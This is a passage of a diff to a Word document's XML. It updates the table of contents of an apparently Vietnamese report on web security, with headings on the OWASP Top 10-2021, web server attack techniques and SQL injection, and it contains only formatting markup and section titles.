+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>1.3.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
           </w:rPr>
           <w:tab/>
         </w:r>
         <w:r>
           <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Tổng quan về các lỗ ổng bảo mật Web phổ biến</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1454,22 +1182,219 @@
         </w:r>
         <w:r>
           <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343441 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>1</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC3"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="1320"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343442" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc207351929 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>1.3.1.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Giới thiệu về OWASP Top 10</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343442 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>1</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TOC3"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="1320"/>
+          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343443" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>1.3.2.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:b/>
+            <w:bCs/>
+            <w:noProof/>
+          </w:rPr>
+          <w:t>Phân tích các lỗ hổng chính trong OWASP Top 10-2021</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343443 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1477,7 +1402,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1485,7 +1409,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1501,12 +1424,16 @@
           <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
           <w:noProof/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc207351930" w:history="1">
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343444" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1515,13 +1442,17 @@
             <w:bCs/>
             <w:noProof/>
           </w:rPr>
-          <w:t>3.</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:sz w:val="24"/>
+          <w:t>2.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
           </w:rPr>
           <w:tab/>
         </w:r>
@@ -1533,11 +1464,10 @@
             <w:bCs/>
             <w:noProof/>
           </w:rPr>
-          <w:t>CÀI ĐẶT</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
+          <w:t>CÁC KỸ THUẬT TẤN CÔNG WEB SERVER</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1545,7 +1475,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1553,22 +1482,19 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc207351930 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343444 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1576,7 +1502,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1584,7 +1509,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1596,15 +1520,20 @@
       <w:pPr>
         <w:pStyle w:val="TOC2"/>
         <w:tabs>
-          <w:tab w:val="left" w:pos="960"/>
+          <w:tab w:val="left" w:pos="880"/>
           <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
           <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc207351931" w:history="1">
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343445" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1613,12 +1542,17 @@
             <w:bCs/>
             <w:noProof/>
           </w:rPr>
-          <w:t>3.1.</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
+          <w:t>2.1.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
           </w:rPr>
           <w:tab/>
         </w:r>
@@ -1630,11 +1564,10 @@
             <w:bCs/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Tiểu mục cấp 2</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:t>Tấn công SQL Injection (SQLi)</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1642,7 +1575,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1650,22 +1582,19 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc207351931 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343445 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1673,7 +1602,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1681,7 +1609,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1693,15 +1620,20 @@
       <w:pPr>
         <w:pStyle w:val="TOC3"/>
         <w:tabs>
-          <w:tab w:val="left" w:pos="1440"/>
+          <w:tab w:val="left" w:pos="1320"/>
           <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
           <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc207351932" w:history="1">
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="ja-JP"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Toc208343446" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1712,12 +1644,17 @@
             <w:iCs/>
             <w:noProof/>
           </w:rPr>
-          <w:t>3.1.1.</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
+          <w:t>2.1.1.</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+            <w:noProof/>
+            <w:kern w:val="0"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:eastAsia="ja-JP"/>
+            <w14:ligatures w14:val="none"/>
           </w:rPr>
           <w:tab/>
         </w:r>
@@ -1731,11 +1668,10 @@
             <w:iCs/>
             <w:noProof/>
           </w:rPr>
-          <w:t>Tiểu mục cấp 3</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:t>Cơ chế hoạt động</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1743,7 +1679,6 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1751,22 +1686,19 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc207351932 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:instrText xml:space="preserve"> PAGEREF _Toc208343446 \h </w:instrText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1774,15 +1706,13 @@
         </w:r>
         <w:r>
           <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>2</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:noProof/>
+            <w:webHidden/>
+          </w:rPr>
+          <w:t>1</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
             <w:noProof/>
             <w:webHidden/>
           </w:rPr>
@@ -1792,407 +1722,22 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="TOC4"/>
+        <w:pStyle w:val="TOC3"/>
         <w:tabs>
-          <w:tab w:val="left" w:pos="1920"/>
+          <w:tab w:val="left" w:pos="1320"/>
           <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
           <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc207351933" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:i/>
-            <w:iCs/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>3.1.1.1.</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:i/>
-            <w:iCs/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>Tiểu mục cấp 4</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc207351933 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>2</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TOC2"/>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="960"/>
-          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
-        </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc207351934" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:b/>
-            <w:bCs/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>3.2.</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:b/>
-            <w:bCs/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>Tiểu mục cấp 2</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc207351934 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>2</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TOC1"/>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="480"/>
-          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
-        </w:tabs>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
-          <w:noProof/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc207351935" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:b/>
-            <w:bCs/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>4.</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:sz w:val="24"/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:b/>
-            <w:bCs/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>KẾT QUẢ</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="begin"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:instrText xml:space="preserve"> PAGEREF _Toc207351935 \h </w:instrText>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="separate"/>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:t>2</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:cs="Times New Roman"/>
-            <w:noProof/>
-            <w:webHidden/>
-          </w:rPr>
-          <w:fldChar w:fldCharType="end"/>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TOC2"/>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="960"/>
-          <w:tab w:val="right" w:leader="dot" w:pos="8211"/>
-        </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:noProof/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink w:anchor="_Toc207351936" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:b/>
-            <w:bCs/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>4.1.</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-            <w:noProof/>
-          </w:rPr>
-          <w:tab/>
-        </w:r>
-        <w:r>
